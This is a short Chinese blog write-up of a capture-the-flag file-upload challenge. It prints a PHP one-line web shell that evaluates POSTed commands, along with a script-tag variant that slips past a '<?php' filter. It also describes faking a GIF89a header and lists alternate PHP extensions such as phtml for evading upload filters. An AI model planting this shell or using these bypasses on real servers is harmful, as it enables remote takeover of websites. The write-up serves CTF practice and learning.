[极客大挑战 2019]Upload

 

知识点

  • js绕过
  • GIF89a文件头

编写一句话木马上传

<?php 
@eval($_POST[cmd]);
?>

 

发现php被过滤
使用js脚本绕过

<script language = 'php'>@eval($_POST[cmd]);</script>

 

发现需要图片


在这里插入图片描述

 

使用文件头绕过


在这里插入图片描述

 

更改后缀名,多次尝试,发现phtml未被过滤

php别名
php3,php4,php5,pht,phtml,phps

 

上传成功


在这里插入图片描述

 

菜刀连接upload/c2.phtml,在根目录下找到flag

 

posted @ 2020-05-11 18:21  山野村夫z1  阅读(206)  评论(0编辑  收藏  举报